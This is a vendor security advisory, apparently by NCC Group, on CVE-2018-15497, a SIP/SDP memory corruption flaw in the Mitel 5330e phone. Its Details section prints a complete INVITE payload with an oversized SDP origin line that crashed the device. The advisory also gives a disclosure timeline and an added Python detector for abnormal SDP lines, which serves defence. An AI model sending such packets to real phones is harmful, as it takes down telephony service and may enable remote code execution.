
Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw

Vendor: Mitel
Vendor URL: https://www.mitel.com
Versions affected: 5330e IP Phone
Systems Affected: Mitel MiVoice
Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]trust
Advisory URL: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0009
CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15497
Risk: Low-High (case dependent) – Denial of Service and possible Remote Code Execution

Summary

The Mitel MiVoice 5330e VoIP device is affected by a memory corruption flaw in the SIP/SDP packet handling functionality. An attacker can exploit this issue remotely, by sending a particular pattern of SIP/SDP packets, to cause a denial of service state in the affected devices and possibly remote code execution.

Location

SIP/SDP packet handling functionality.

Impact

Denial of service and potential remote code execution

Details

The following SIP/SDP packets were used to trigger the memory corruption condition:

<- SNIP -> INVITE sip:7301@172.16.140.40 SIP/2.0 Via: SIP/2.0/UDP 172.16.140.46:5060;rport;branch=branchyPStYido2t Max-Forwards: 70 From: "7302";tag=IKdO1hnVEu To:  Call-ID: calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@172.16.140.46 CSeq: 13100 INVITE Contact:  User-Agent: Test Agent Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO Accept: application/sdp Content-Type: application/sdp Content-Length: 1086  v=0 o=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0 0 IN IP4 127.0.0.1 s=-  c=IN IP4 127.0.0.1 t=0 0 m=audio 16782 RTP/AVP 0 a=rtpmap:0 PCM/8000 a=extmap:1 urn:ietf:params:rtp-hdrext:csrc-audio-level a=extmap:2 urn:ietf:params:rtp-hdrext:ssrc-audio-level a=rtcp-xr:voip-metrics m=video 16541 RTP/AVP 96 99 a=recvonly a=rtpmap:96 H264/90000 a={inj[28]}:96 profile-level-id=4DE01f;packetization-mode=1 a=imageattr:96 send * recv [x=[0-1366],y=[0-768]] a=rtpmap:99 H264/90000 a=fmtp:99 profile-level-id=4DE01f a=imageattr:99 send * recv [x=[0-1366],y=[0-768]]  SIP/2.0 400 Bad Request Via: SIP/2.0/UDP 172.16.140.46:5060;rport;branch=branchyPStYido2t From:"7302" ;tag=IKdO1hnVEu To:;tag=5b33b7f1-3ac-2f1e08b1 CSeq:13100 INVITE User-Agent:Mitel-5330e-SIP-Phone 06.05.00.11 08000FBFA477 Call-ID:calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@172.16.140.46 Content-Length:0 <- SNIP -> 

As shown in the following screenshot, a denial of service condition was triggered:

Figure 1 – Triggering memory corruption condition

 

Recommendation

According to the vendor, the Mitel 5330 phone has been superseded by the Mitel 68xx series phones; it is therefore recommended to replace the affected device with the new version.

After further investigation, the vendor released a public advisory with mitigations and recommended actions (https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0009).
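
For devices that cannot be replaced immediately, traffic in front of them can be screened. The packet under Details carries an SDP origin (o=) line far longer than normal; the advisory does not say which field triggers the fault, so this added example (not NCC Group's or Mitel's code) simply flags over-long or malformed SDP lines and Content-Length mismatches. The threshold, function names and sample messages are assumptions.

```python
# Added example: screen SIP messages for abnormal SDP bodies before they reach a phone.
MAX_SDP_LINE = 256  # assumption: site-specific threshold, not taken from the advisory

def split_sip(raw: bytes):
    """Split a SIP message into (start_line, lower-cased headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("utf-8", "replace").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def inspect_sdp(raw: bytes, max_line: int = MAX_SDP_LINE):
    """Return a list of findings for one SIP message; an empty list means nothing flagged."""
    _, headers, body = split_sip(raw)
    findings = []
    if "application/sdp" not in headers.get("content-type", "").lower():
        return findings  # no SDP body to inspect
    declared = headers.get("content-length", headers.get("l"))  # "l" is the compact form
    if declared is not None and declared.isdigit() and int(declared) != len(body):
        findings.append(f"content-length {declared} != body length {len(body)}")
    for n, line in enumerate(body.decode("utf-8", "replace").splitlines(), 1):
        if not line:
            continue
        if len(line) < 2 or line[1] != "=":
            findings.append(f"sdp line {n} is not <type>=<value>")
        elif len(line) > max_line:
            findings.append(f"sdp line {n} ({line[:2]}) is {len(line)} chars")
    return findings

def sample_invite(origin_user: str) -> bytes:
    """Constructed sample input for the detector (documentation addresses only)."""
    sdp = "\r\n".join(["v=0", f"o={origin_user} 0 0 IN IP4 192.0.2.10", "s=-",
                       "c=IN IP4 192.0.2.10", "t=0 0", "m=audio 16782 RTP/AVP 0", ""])
    head = "\r\n".join(["INVITE sip:1000@192.0.2.20 SIP/2.0",
                        "Content-Type: application/sdp",
                        f"Content-Length: {len(sdp)}"])
    return (head + "\r\n\r\n" + sdp).encode()

if __name__ == "__main__":
    for user in ("alice", "A" * 1000):
        print(len(user), inspect_sdp(sample_invite(user)))
```

The same checks can be expressed as a rule on a session border controller or SIP-aware IDS; the Python form is only meant to make the logic explicit.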

Vendor Communication

2018-07-16 Advisory reported to Mitel
2018-07-16 Mitel acknowledgement
2018-07-17 Details provided
2018-07-30 Mitel did not plan any mitigation since the affected version has been superseded by a new series of phones
2018-08-10 Mitel agreed to publication of the advisory
2018-09-25 Mitel released Product Security Advisory 18-0009

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Mattia Reggiani